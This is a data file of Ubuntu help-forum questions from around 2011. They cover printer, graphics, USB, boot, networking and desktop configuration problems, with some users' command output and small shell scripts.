87206	brother mfc-8860dn is not working after upgrade to 11.10	i upgraded to ubuntu 11.10 from 11.04 and my brother mfc-8860dn ( duplex and network printer , scanner and copier ) stopped printing . i did not check scanner possibility . now it is not important for me ... before in 11.04 it was printing even without it 's drivers . i could install drivers from different brothers and it was working very perfectly with almost any driver . my brother is still working from windows . nothing wrong with my brother . now i even upgraded firmware on printer , downloaded the latest drivers from brother , found ppd file . there is no result ! ! ! sometimes it is not working at all , sometimes it prints blank paper and very often and very terrible it is printing rubbish in 1-2 strings and pull out paper many times until i switch off brother . but it can print 20-30 sheets before i reach the button power off because it is networking and very fast mfc . i myself a sysadmin and a programmer but i am not a linux driver developer . if someone has a clue please advise .
87207	how to automatically put text into picture files	i have a template for a business card and a text file with several hundred codes ( each separated by commas ) . is there a method to ( automatically ) : for each code overlay it onto the template and export an image ? note : i 'm hoping to achieve results similar to this : http : //uk.moo.com/ideas/perch.html .
87211	how to run bully : scholarship edition ?	can someone give a step-by-step tutorial on how to run it under wine ?
87212	what can i do to improve ubuntu 10.10 performance on my netbook ?	i am not new to linux , but i 've never really dug in and am much more proficient with windows and mac os . i 've used ubuntu off and on since it was first released , and used fedora for quite a few years on a spare laptop . i also ran solaris 8/9/10 on a workstation in my office . to give some background , i run my own business providing computer and creative consulting services to home users , small businesses , schools and non-profit organizations . most of my solutions involve windows clients and servers ( either because that 's what clients are familiar with , or because they use proprietary software , primarily in the financial and auto repair industries , that only runs on windows or shutters novell netware ) , though i have been converting several clients to mac os x solutions . i do , however , live in an economically depressed area ( former steel mill and heavy industry town ) and many small businesses and schools ca n't afford to invest in the technology they really need . i see linux becoming a major enabler for the revitalization of my community . that being said , though i 've used linux for many years , i 've never really developed the proficiency needed for me to feel comfortable implementing solutions for others . i 'm working on that , and as a result , have decided to start running ubuntu on a daily basis on the netbook i use with me when i go out on service appointments , browse the web at home , and use for minor productivity work . when i used fedora on a few older toshiba laptops , i never had any performance issues that i noticed . they were pentium 4 machines with 1gb and 2gb of ram , one machine ( a satellite ) had an integrated/shared video chipset and the other ( a higher-end tecra ) had a dedicated video chipset . both machines were fast , responsive , and flexible . now i 'm using an hp mini 210-1076nr netbook that originally ran windows 7 starter edition ( and later ultimate ) with 1gb of ram . this machine has a cellular modem from verizon wireless , though i no longer need to use this since my contract has expired . the machine is in its original condition , aside from a hard drive replacement ( 250gb 5400 sata ) and has 1gb of ram . i 'm running the latest ubuntu release , 10.10 , and unity ( which i ca n't stand ... but that 's not really relevant ) . performance seems incredibly slow.. really , really slow . there is such a lag between launching a program and it being useable . i constantly have the screen dimmed and the system just lock up and become unresponsive , sometimes for minutes at a time . it seems like the hard drive is working overtime , even with the simplest of programs : text editor , firefox or google chrome with one or two tabs open , tomboy notes , etc . i do n't have much running in the background : the weather applet , tomboy notes ... at one point i did have my social networking accounts added to gwibber but the implementation was so half-assed that i ended up removing them . i plan on installing the older adobe air version of tweetdeck , but i 'm not running that at this time . is there anything i can do to tune or improve performance ? the toshiba laptops i had previously ran fedora on have since been given to clients , and they are running the same version of ubuntu . those machines , while not really new , have considerably better performance than my 1-year-old netbook . i am willing to upgrade my ram ( the maximum is 2gb ) , but i 'm wondering if that will really make a difference . surprisingly , windows 7 ultimate ran really fast on this same machine , even with 1gb of ram . will upgrading the ram give me the performance boost i need , or is that not the issue ? is this machine 's architecture not very suited to ubuntu ? i do n't really know what questions to ask , or what to do , aside from upgrading the ram . this is just a netbook , and i do n't use it for any hardware-intensive tasks , so i do n't want to invest money in an ssd , but i 'm willing to spend money on a ram upgrade . what else can i do ? is there any performance tuning i should do ? i want to run ubuntu 10.10 , and i want to use unity , because that 's what my clients will be using . while i appreciate that a different desktop environment , like gnome classic , might give better performance , or a variant of ubuntu like edubuntu might be better suited to older machines , those really are n't the answers i 'm looking for . i 'd appreciate any advice , suggestions , etc . while i 'm not well versed in all the linux terminology , i am willing to learn and research anything , as gaining this knowledge is crucial to expanding my business .
87221	why is the meta key is not working when using emacs ?	suddenly , i am not able to use any combination of meta keys . the alt key is not working at all in my emacs . can anyone help me on this issue ?
87223	is there a way to see the installed versions of all dependencies of a package ?	i 'd like to be able to output a list of all the dependencies of an installed package , including the version numbers of the dependencies that i have installed .
87227	switch encoding of terminal with a command	one of the servers i quite often ssh to uses western encoding instead of utf-8 ( and there 's no way i can change that ) . i 've started writing a bash script to connect to this server , so i wo n't have to type out the entire address every time , but i would like to improve this script so it also changes the encoding of the terminal window correctly . the change i need to do can be performed using the mouse by navigating to `` terminal '' - > '' set character encoding ... '' - > '' western ( iso-8859-1 ) '' . is there a terminal command that does the same thing , for the current terminal window/screen ? to clarify : i 'm not interested in ways of switching the locale of the system on the remote site - that system is administered by someone else , and i have no idea what stuff might depend on the latin-1 encoding there . what i want to do is to let this terminal window on my side switch character encoding to the above mentioned , in the same way i can do with my mouse and the menus .
87228	can not use both headphone ports on dell xps l502x at the same time	i am having a problem in ubuntu 11.10 using both of the headphone ports on my dell . this may or may not apply to other computers as well . basically , there is a normal headphone jack next to an s/pdif jack next to a mic jack . unfortunately , i am unable to use both headphone jacks simultaneously , as is possible when running windows . how can ubuntu be reconfigured so as to use both headphone jacks ?
87230	not enough swap space to hibernate ?	it seems that i have enough though ; maybe it 's not automatic swap mounting ? any help on getting hibernate working is appreciated .
87232	removed folder re-appears again	please do n't think i 'm crazy , but a folder in ~/downloads which i 've deleted ( via rmdir ) appears again and again . any idea what 's wrong here ? the ubuntu is oneiric .
87236	will i benefit from windows drivers in virtual machine ?	i ordered a sony vaio vpc-se1 ( s-series ) laptop , but i want to keep using ubuntu . searching the internet for issues with vaio laptops in ubuntu , there could be 1 particular issue that really bugs me , being the fact that the laptops run hotter in ubuntu so that the fan is almost always on ... i 'm looking for solutions to keep using ubuntu with the system not overheating and the fans not spinning like mad , should the issue be present . a possibilty i had in mind was to use windows , with all sony drivers for the windows platform , as a host for ubuntu in a virtual machine with virtualbox , with the virtual machine automatically starting up after booting windows . i 'd expect that in this configuration ubuntu will benefit from the windows drivers and will not have the fan issue at least , or so i hope ? ?
87237	sbm.bin is too big for 1.44 floppy disc	trying to boot ubuntu on dell 8250 with only ibm-dos . need floppy to run the cd rom drive for it.the sbm.bin is 1,474,560b but floppy is only 1.44mb and i get message that disc is too small . any help would be appreciated ...
87239	how to i will add jpg or gif or png ( logo or emblem ) in terminal	i want to add jpg logo in terminal..but not ascii format
87241	how to install using btrfs in raid10 mode ?	as a test i want to install ubuntu 11.10 onto a btrfs file system in raid10 mode . however , i have no clue on how i should go about that . i have tried the installer , and then creating the fs in the terminal . however , that did n't work out . when i went back to the graphical interface i could n't install . because it did n't have any mount points . so , how should i do this ? after using the alternate installer and dropping to a shell i did the following : mkfs.btrfs -m raid10 -d raid10 /dev/sda /dev/sdb /dev/sdc /dev/sdd then you also need to run : btrfs dev scan then when choosing the partition to install to , select one of the above and mount that to / . leave all partitions untouched . this installs the system , however , installing the bootloader fails ...
87247	missing users after clean install and seperate home partition	i had three users , one admin and two standard , in a separate /home partition running 10.04 . i did a clean install of 11.10 by checking the format / and /swap boxes in the partition section of the install program . the program then asked for an admin name and i gave it the same user name and password as the admin on 10.04 . when i completed the install the admin account was the only available user at start up . when logging in as user i have all my previous user setting as i had in 10.04 . yet there are no standard user ! i went to the terminal and listed the home directories and the standard users /home directory data is still there . how come 11.10 does not recognize them ?
87252	ati / grlrx / catalyst + gnome-shell = problems	not duplicate to this nor this nor this one hello there is a known bug with ati driver ( fglrx ) and gnome-shell , i know . just wondering why i can play 3d games with high graphic features using same driver ( version 11.11 ) ? also there is no problem with graphical effects of kde and other programs using graphical environment , but there is problem with very simple effects of gnome-shell ? . what is special with gnome-shell ? note : there are some success stories around ... nothing worked for me . i tried removing fglrx , installing the 11.11 driver downloaded from amd , disabling tear effect in catalyst control center ( with and without administrative privileges ) , disabling vsync in compize setting ... ... note 2 : i 've installed ubuntu 11.10 amd64 on dell inspiron n5010 . graphic card is ati hd mobility radeon 5470 .
87255	empathy , google account , 2 step verification needs authorization every time i login	the title says it all . i have enabled 2 step verification at my google account . unfortunately this causes empathy to lose authorization after every reboot . even though i authorize empathy following the steps : 1 ) going to google account management 2 ) clicking `` authorizing applications & sites '' 3 ) using the `` generate new application-specific password '' feature 4 ) adding that new password to empathy this all works fine the first time i do it . but after a reboot , empathy does n't feel authorized anymore , and i need to do it again . it 's getting too much of a frustration . is there a way to make google remember empathy 's authorization ? looking at google 's `` revoke '' option , i am thinking the authorization should stay there .
87257	windows 7 can see server , but not its contents	i 'm a newbie to ubuntu so i apologize if i 'm overlooking something easy , but i installed samba and for whatever reason i can see my ubuntu server on my windows 7 computer , but when i click on it i can not seem to pull up anything on it . any ideas ?
87258	every binary 'wine ' executable `` does not exist ''	i 've had this problem once before , but i completely forgot how i fixed it . every wine executable ( /usr/bin/wine , or the wines in the playonlinux dir ) `` do not exist '' when i try to execute them . $ wine bash : /usr/bin/wine : bestand of map bestaat niet
87265	open spelling correction dialog by keyboard shortcut instead of right click	say i go into a browser ( chrome ) or a chat window ( empathy ) and type `` calandar '' , an obvious misspelling of the word calendar . the word is underlined with red squiggles and i want to auto correct this word . i could right click on the misspelled word and pick the correction , but using the mouse is inefficient . how could i invoke the spell correction dialog with a keyboard shortcut and have it work across all apps ?
87266	how do i fix the brightness on a samsung aura r700 dillen ?	my problem : since ubuntu 10.04 i can no longer adjust the background brightness of the built in lcd-panel . the laptop ( samsung aura r700 dillen - nvidia 8600m gt gpu ) is always on a very low brightness-level . since ubuntu 11.04 the below detailed solution does n't work any more . in ubuntu 10.04 the solution to the backlight problem was rather `` simple '' : open nvidia-settings and create/save and merge a xorg.conf file . open a terminal and : sudo gedit /etc/x11/xorg.conf once opened , in the `` device '' section , add this line : option `` registrydwords '' `` enablebrightnesscontrol=1 '' save and exit . reboot the machine . done . i want to do the same thing in ubuntu 11.10 , because this takes care of the brightness-adjust problem . ** how can i safely create and edit xorg.conf in ubuntu 11.10 ? i ca n't find it and a lot of ppl suggest different methods how to create it again . some are known to cause the computer to not boot correctly . adding the voria-tools ppa is not an option . i do n't like installing untrusted ppa 's . also , i tried this before and it never worked . i have tried the steps mentioned in the link oli posted . a few of those steps made ubuntu hang during bootup ( editing grub to add the acpi-line for example ; it always typed in something different - something was buggy there ) .
87268	how do i use the media keys on a dinovo edge keyboard	i 've got as far as connecting this keyboard using the manual bluetooth configuration - i assume that since 11.10 is detecting it ( from lsusb ) then the keyboard configuration is correct . fowever , only a few of the media keys are detected ( email , vol+ , vol- ) . showkey detects some more keycodes ( 418 , 419 , 420 for example ) , but xev does not . where should i be looking to determine at which layer the keys are missing ?
87273	have installed ubuntu but when i restart computer , it only goes to 'grub ' ... ubuntu does n't load ?	i have installed ubuntu ( without windows ) and done a restart . ubuntu does n't load ... all i get is grub > and do n't know how to get beyond it . can you help
87274	goflex home drive visible but wo n't mount	how do i get the `` goflex home '' network drive to mount in ubuntu 10.4 ?
87275	why ubuntu does not have /usr/bin/bash	this is not a problem , just curious : why ubuntu does not have /usr/bin/bash ? as link to /bin/bash or other direction .
87276	ugly graphics after suspend . is there a solution ?	so this is what i 'm seeing on my macbook pro 5,3 running ubuntu 11.10 with gnome-shell and nvidia graphics card after i have resumed from a suspend . the icons on the left hand side was also blurred with noise as you can see on the text , but that seemed to have fixed itself after some time , maybe it had something to do with me taking a screenshot , idk . anyways , speculation aside , has anyone seen this kind of a behavior after a suspend command was given ? and more importantly ; any known fixes ? thanks a bunch ! large version no1 large version no2
87278	how to install this kernel ?	i have a samsung notebook with core i3 sandy bridge processor and i want to install the patched kernel available here : https : //wiki.ubuntu.com/kernel/powermanagement what kernel version should i install , oneiric ocelot or precise pangolin ? what packages should i install ? and how should i install them ( the easiest way possible , please ) ? additional info : ubuntu 11.10 x64 with kernel 3.0.0-14 . thanks .
87279	why does n't firefox obey my icon theme ?	i 'm using the faenza icon set in 10.04lts . within the gnome-panel , alt-tab and possible more instances firefox does not use the faenza icons . all other apps seem too , just not firefox . any idea why , or how to fix it ?
87284	can i control where an application launches so it does n't make my launcher autohide ?	is it possible to lock the spawn location of applications so they do n't hide the unity bar ? at the moment applications launch up the top left of the screen , pushing out my unity bar ( which is really annoying ) and just generally being hard to reach on my dual monitor setup . only some applications do this , however . i hoping there is some kind of way i can over-ride this and force all applications to start in the location they were last closed , or at the least be able to turn off the auto-hide of the unity bar . hoping we can come up with something here .
87287	can i uninstall compiz if only using gnome-shell ?	i already know that i can uninstall unity if i 'm using gnome-shell exclusively , but i 'm also wondering if it 's safe to uninstall compiz when i 'm only using gnome-shell , since as far as i know , gnome-shell does n't use compiz .
87292	when i tried the live cd , my multiple monitor setup worked . after i installed , it did n't . what gives ?	i just installed ubuntu 11.10 x64 , after making sure i could use my 2-monitor setup with the live cd , but now ubuntu can not detect both my monitors . i 've tried both of the additional drivers that ubuntu offers , and neither helps . i 've got a pny gts 250 1gb card with 2 dvi monitors hooked up , if that helps . here 's a screenshot of my display settings screen : http : //i.imgur.com/awcfi.png any ideas on how to get it working like i did with the live cd ? or why it was working from the live cd but wo n't work now that i 've installed ?
87300	disk usage confusion	i came in this morning to find my ubuntu dev machine with a notice that it had run out of disk space . however , it 's got a 500gb drive , and it seems like any way i slice it there 's tons of room left . any ideas where the filesystem is getting crammed up ? $ df -th filesystem type size used avail use % mounted on /dev/sda1 ext4 451g 12g 416g 3 % / udev devtmpfs 3.8g 12k 3.8g 1 % /dev tmpfs tmpfs 1.6g 800k 1.6g 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 3.8g 656k 3.8g 1 % /run/shm file system analysis : gparted : edit to add more : $ df -i filesystem inodes iused ifree iuse % mounted on /dev/sda1 30023680 447800 29575880 2 % / udev 981650 504 981146 1 % /dev tmpfs 991873 427 991446 1 % /run none 991873 2 991871 1 % /run/lock none 991873 9 991864 1 % /run/shm full analysis :
87301	problem starting apache	before the question let me give some background info : i have ubuntu karmic installed on top of android on my asus transformer . i have also installed netbeans , git , tightvncserver and openssh . i am viewing the desktop using an android vnc viewer app . tightvnc is listening on port 5900 and 5901 . now for the question/problem i have . i have installed apache2 . it installed without a problem . when i start the apache service it show in terminal that it is initializing without a problem , but when i check the ports using netstat -tulpn i do n't see apache listening on any ports . all i see is tightvnc . this is the error i see in the apache error.log file . [ warn ] pid file /var/run/apache2.pid overwritten -- unclean shutdown of previous apache run ? [ emerg ] ( 38 ) function not implemented : could n't create accept lock ( /var/lock/apache2/accept.lock.13752 ) ( 5 ) this is show various times . any suggestions ?
87306	how to install libboost 1.48 ?	i would like to install the latest boost c++ libraries onto my 10.10 system using a ppa but can not find one that works . nordlรถw already suggested good sources in a similar discussion but i could not install the library . the installer states that i have the latest version running . the ppa : purplekarrot by daniel pfeiffer does not upgrade my current 1.42 installation . although i try to follow the exact instructions by fossfreedom there are no packages listed to being upgraded when i run sudo apt-get upgrade . here is the output log . when i try to install libboost-filesystem the only tab completions i am offered are the following . โก sudo apt-get install libboost-filesystem libboost-filesystem1.40.0 libboost-filesystem1.42.0 libboost-filesystem-dev libboost-filesystem1.40-dev libboost-filesystem1.42-dev
87308	errors with atftpd : unterminated quoted string	after upgrading ubuntu from 11.04 to 11.10 ( 32bits ) i 'm having trouble with atftpd : anytime i 'm starting atftpd i 'm getting this error : /etc/default/atftpd : 2 : syntax error : unterminated quoted string anytime i 'm trying to install/remove any package ( apt-get or ubuntu software center ) i 'm getting this error : setting up atftpd ( 0.7.dfsg-10 ) ... /etc/default/atftpd : 2 : syntax error : unterminated quoted string dpkg : error processing atftpd ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : atftpd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas ? thanks ! !
87310	boot menu has a problem i can not boot ubuntu or anything because the menu does not show	alright so i downloaded and installed ubuntu to a windows xp machine via wubi . when i rebooted the boot menu did n't show up .
87311	how to intercept all keystrokes	first of all , i do n't expect that something like this already exists , but i am interested in knowing how something like this would be accomplished . i want a program that i can have running in the background that will intercept all keystrokes entered ( i 'm assuming x is running and perhaps even that unity is also running ) , process those keystrokes and then send the original or modified keystrokes on to be handled as normal . my ultimate goal is creating a sort of keymapping that more closely mimics os x shortcut behavior . this is very difficult with a standard ubuntu install since things like ctrl+c seem to be set in stone whereas to mimic os x behavior , it would need to be cmd+c . anyway , i 'm less interested in discussing the why and more interested in discussing the how . i 'm not adverse to writing a daemon in python , c or whatever else might be needed ( i 'm also somewhat comfortable with standard unix apis ) . i am , however , completely ignorant about where to begin with something like this . when the keystrokes are intercepted and processed , it should be able to send them back to the os following the same interface that the strokes were originally sent with . maybe this would have to be a patch to x itself ? or would something be able to be in place between the keyboard and x ?
87314	how to move the user cache directory [ ~/.cache ] out of the /home directory to another partition	the .cache directory is full of volatile , non-essential files . i would like to move it to a more appropriate partition , i.e . faster and not backed up . i believe that ~/.pam_environment file is appropriate for this but am not sure if is the best or if it is documented properly or working properly .
87315	having problems with mounting usb flash drives	sorry for such a long post : ) i 'm not such an expert as i wan na be , but i 'm still learning on my mistakes . just recently i 've encountered an problem with mounting usb flash memory sticks and external usb dvd recorder . after upgrading from 11.04 ( which was fresh installed ) to 11.10 i have n't use any usb devices except usb external disk which is always connected to one port and working properly , automatically mounted on every login and os never asked or warned me for anything regarded with this device . but , when i plug in any of my two flash memory sticks - nothing happen . right now , when i 'm writing this , i have plugged in two flash sticks , both are from adata , one is c003/4gb , and another is c702/8gb . both are tested on several other computers with ubuntu , debian or even with xp , and they 're mounted without any problems and formatted on fat32 , and they 're working on this computer before on earlier ubuntu versions . i 've tried to solve this problem in many ways founded on many linux or ubuntu forums , but it seams that my system is something different . so , some of listed results after few commands on terminal are : sudo fdisk -l disk /dev/sda : 60.0 gb , 60011642880 bytes 255 heads , 63 sectors/track , 7296 cylinders , total 117210240 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e4de4 device boot start end blocks id system /dev/sda1 2048 4999167 2498560 82 linux swap / solaris /dev/sda2 * 4999168 117209087 56104960 83 linux disk /dev/sdb : 1500.3 gb , 1500299395072 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930272256 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ce22d device boot start end blocks id system /dev/sdb1 63 2930272064 1465136001 7 hpfs/ntfs/exfat disk /dev/sdd : 8075 mb , 8075140608 bytes 255 heads , 63 sectors/track , 981 cylinders , total 15771759 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00036ae0 device boot start end blocks id system /dev/sdd1 63 15759764 7879851 b w95 fat32 mount /dev/sda2 on / type ext4 ( rw , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/tomislav/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=tomislav ) /dev/sdb1 on /media/074ec1a009b5f389 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 1058:1021 western digital technologies , inc . elements 2tb bus 003 device 002 : id 046d : c016 logitech , inc. optical wheel mouse bus 001 device 008 : id 125f : c03a a-data technology co. , ltd . bus 001 device 005 : id 125f : c72a a-data technology co. , ltd. also , by running gconf-editor and navigating through apps-nautilus-preferences i noticed that there 's no more two lines mentioned on many solutions : `` media_automount '' and `` media_automount_open '' , and after adding them manually - nothing new happen . since i 'm trying to solve this problem for three weeks now and i 'm running out of time because i 'll need to use my usb flash to transfer some big files from work computers to mine , and i have no choice but to kindly ask anyone to help me .
87319	can i boot ubuntu from a floppy ?	i 'm stuck on a really old computer with ~500mb ram and a 6gb hdd . it has windows 2000 . being not from this side of the century ( it originally ran windows 98 ) , the bios does not have an option to boot from usb . it also does not have a cd burner , and i do n't have any money to order a livecd off the internet . so i only have a usb port and a floppy drive to work with . when i tried dsl , i had a floppy that contained the kernel and syslinux . i realize that the ubuntu kernel is too large to fit on one 1.44mb floppy , but is there some sort of program/boot loader that could load from usb from a floppy ? yes , i tried plop . it did n't work because of my old bios . is there a program that i can use to boot ubuntu from a floppy and a usb ? also : i only have a power user account . so a lot of things go straight out the window there .
87320	how do i use different wallpaper on each workspace ?	i want to use different wallpaper on each workspace , but the following does not change background wallpapers : there are problem ... .left -right at click on workspaces . ( ubuntu 10.04 ) ... startwall.sh a file i have created and i called terminal in sh startwall.sh and i added startup application and i have run to applicatiion.but i want to play as automatic background always on each workshapes . code : # ! /bin/bash ws= $ ( wmctrl -d | wc -l ) cws= $ ( wmctrl -d | awk '/*/ { print $ 1 } ' ) lws= $ ( ( $ cws-1 ) ) if [ $ lws = -1 ] ; then lws= $ ( ( $ ws-1 ) ) gconftool -t string -s /desktop/gnome/background/picture_filename `` /root/desktop/wall/b.jpg '' ; else gconftool -t string -s /desktop/gnome/background/picture_filename `` /root/desktop/wall/q.jpg fi or # ! /bin/bash # ws= $ ( wmctrl -d | wc -l ) cws= $ ( wmctrl -d | awk '/\*/ { print $ 1 } ' ) if [ $ cws = 0 ] ; then wmctrl -s $ cws gconftool -t string -s /desktop/gnome/background/picture_filename `` /root/desktop/wall/b.jpg '' else gconftool -t string -s /desktop/gnome/background/picture_filename `` /root/desktop/wall/q.jpg '' fi
87326	a proxy problem of `` sudo apt-get install ''	i am trying to install a package python-pygments under ubuntu . after launching sudo apt-get install python-pygments , it is blocked : reading package lists ... done building dependency tree reading state information ... done suggested packages : ttf-bitstream-vera the following new packages will be installed : python-pygments 0 upgraded , 1 newly installed , 0 to remove and 43 not upgraded . need to get 347 kb of archives . after this operation , 2,527 kb of additional disk space will be used . 0 % [ connecting to cache.polytechnique.fr ( 129.104.38.6 ) ] cache.polytechnique.fr in the line line is the proxy of my school . a download in the campus should work , but the problem is that i am physically not in the campus . i try to remove proxy setting via chromium ( the method of network proxy : none ) , it still drives to cache.polytechnique.fr , does anyone know how to let sudo avoid this proxy ?
87330	gadmin samba seems to change my password and cant share my printer	i have 3 pc at home , a low end desktop running xubuntu , a windows 7 laptop and another laptop dual booting windows and ubuntu.. since days i have been messing around to make the printer attached to desktop work but i cant it fails every time ... this time i started usc and searched printer server and installed gadmin samba ... after a few messing around it looks like gadmin has changed my password ... . how do i reset it and get the printer avail to all other pc
87332	is it possible to make workspaces in unity act like they do in gnome shell ?	i was using gnome shell but switched back to unity due to the amount of screen space i lost using shell . one thing i miss from shell is the workspace switcher it uses compared to unity 's and imo , it is better done in shell . is there a way to implement that in unity at all ?
87335	nautilus : `` can not load supported server method list . please check your gvfs installation ''	i was trying to connect to a sftp server using nautilus ... but i could not as it showed this error :
87338	ups auto shutdown ( socomec 3kva rt )	can socomec support ubuntu 2.6 for auto shutdown ? where can i locate the instruction for set up ?
87339	missing unity after upgrade	ubuntu was working fine . i upgraded to 11.1 . the launcher is no longer visible , nor does moving the cursor to the left window margin work , nor does alt-f2 help , etc . however , when i login as guest , the unity interface appears to be correct and as expected all this leads me to believe that the problem is due to a ( probable ) config option . however , at this time , i am trying to learn ubuntu and am quite unfamiliar with the system and all associated jargon , so i need a very simple , step by step explanation . thanks .
87344	google-chrome-stable_current_amd64.deb file could not be opened ?	i am using 64 bit ubuntu 11.10 . i am trying to install the google chrome web browser by downloading `` google-chrome-stable_current_amd64.deb '' file but when i try to open it by using ubuntu software center it is saying that that .deb file could not be opened . little help please
87349	how can i map the right super key to open a specific appindicator 's menu ?	for example , i have the classic menu indicator installed , and i 'd like for the menu to fly out after i hit the right super key .
87352	missing evolution mail and chat icons from panel in oneric ocelot	i had ubuntu 11.04 installed on my machine . upgraded to ubuntu 11.10 and installed weather-indicator . after this , my evolution mail and chat ( empathy ) icons that were placed in the panel ( at right-up screen corner ) disappeared . i want to put them back , so that i 'll be notified by evolution mail or chatting programs . can anybody help me on this ? thanks .
87354	failed to download package list , report this to developers	im am unable to install new packages and updates , i get an error as shown below , pls help
87361	`` [ drm ] nouveau 0000:04:0.0 : pfifo_dma_pusher '' in the kernel.log file and the boot freezes	i recently wrote a post here about not being able to use a live cd or usb as it would always freeze just after showing the screen ( though the cursor still responded to motion ) . since then i have done the only other possible thing . i downloaded the alternate cd on my 40kb/s line ( what a mission ) . i created a bootable usb with usb-creator-gtk . this did n't work , so i opened it up and moved the files so that they could be found on boot . ( usb-creator is clearly useless ) . so then i finally started installing ubuntu . this was wonderful . upon completion i realised i had n't installed a desktop manager . so i did apt-get install ubuntu-desktop to get lightdm and unity and whatever else makes up the desktop manager . then i restarted . and ... . it loaded the login screen and , just like the live cd and live usb , then decided to freeze and not respond to anything i do with the keyboard or mouse . in my opinion this seems to be a clear problem with the desktop manager that is probably used on the live cd and the full install . but how on earth do i fix it.. i was running gutsy before this , but after using natty and then oneiric on my laptop , i decided it was worth backing up , formatting and starting afresh on my 3-year old pc . but i 've now been stuck for days with only windows 7 which is not ideal . the only real error messages i could see in logs were of the form usb 7-1 : device descriptor read/64 , error -71 , usb 7-1 : device not accepting address 5 , error -71 and hub 7-0:1.0 : unable to enumerate usb device on port 1 . but if you tell me which logs to look in i will tell you what they say and be very appreciative for any help . some extra info : windows 7 is installed as well ( same disk , different partition ) quad core intel cpu nvidia geforce gtx 295 4gib ram ( checked with memtest ) update : i was just scouring /var/log/kernel.log and found a few lines of the form : [ drm ] nouveau 0000:04:0.0 : pfifo_dma_pusher - ch 2 get 0xffffffffc put 0x0000fffff8 ibget 0x00000065 ibput 0x00000066 state 0xc0042056 ( err : mem_fault ) push 0x00400040 which seems like a problem to me given the err and mem_fault parts and they are the last lines.. i ca n't imagine my video memory has a problem though as the card works perfectly in windows .
87362	ipw2200bg wireless network troubles connecting on an ibm r50e	i just upgraded my system from a 11.04 wubi installation ( windows dual boot ) to an ubuntu 11.04 stand-alone installation on my ibm thinkpad r50e . i think i got the very same trouble evinced from other users , but expecially as the one found in this forum : i do n't get internet on wireless connection while previously , under windows , the connection worked flawlessy ( indeed under windows and wubi too ) , now i 'm unable to get a stable link , and the speed shown running a `` connection informations '' is very low if compared with the one shown on windows or on the previous wubi version of the same o.s . as suggested on the linked previous 3d , i ran a ipconfig and a ping -qc1 example.com ; ping -qc1 8.8.8.8 , posting hereafter the results . thank you very much for your valuable support . here is the output of iwconfig : eth0 link encap : ethernet hwaddr 00:0a : e4 : c4:0c : bc up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisioni:0 txqueuelen:1000 byte rx:0 ( 0.0 b ) byte tx:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:12 : f0:1d : ee:1a indirizzo inet:192.168.1.3 bcast:192.168.1.255 maschera:255.255.255.0 indirizzo inet6 : fe80 : :212 : f0ff : fe1d : ee1a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:470 errors:0 dropped:0 overruns:0 frame:0 tx packets:815 errors:0 dropped:0 overruns:0 carrier:0 collisioni:0 txqueuelen:1000 byte rx:110021 ( 110.0 kb ) byte tx:97984 ( 97.9 kb ) interrupt:11 memoria : d0200000-d0200fff lo link encap : loopback locale indirizzo inet:127.0.0.1 maschera:255.0.0.0 indirizzo inet6 : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:55 errors:0 dropped:0 overruns:0 frame:0 tx packets:55 errors:0 dropped:0 overruns:0 carrier:0 collisioni:0 txqueuelen:0 byte rx:3661 ( 3.6 kb ) byte tx:3661 ( 3.6 kb ) and my ping output : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . -- - 8.8.8.8 ping statistics -- - 1 packets transmitted , 1 received , 0 % packet loss , time 0ms rtt min/avg/max/mdev = 1100.274/1100.274/1100.274/0.000 ms ping : unknown host example.com since i 'm italian , you can see some italian words in the output , i do n't think this should be a problem . anyway , if you need a translation , i 'll be happy to provide it to you .
87363	where can i find the command line ?	a basic question : where do i find the command line ? there is a lot of information about commands and using the command line , but i 'm an absolutely new ubuntu user : i ca n't find find the command line .
87365	how can i stream my audio output with vlc to my android device ?	i want to use my android device like a wireless headset , i want to stream my audio output with vlc and listen to that with an android app . how can i make this happen with vlc ? and what app can i use on my android device to listen to it ? note that i want to stream the audio , not just music files .
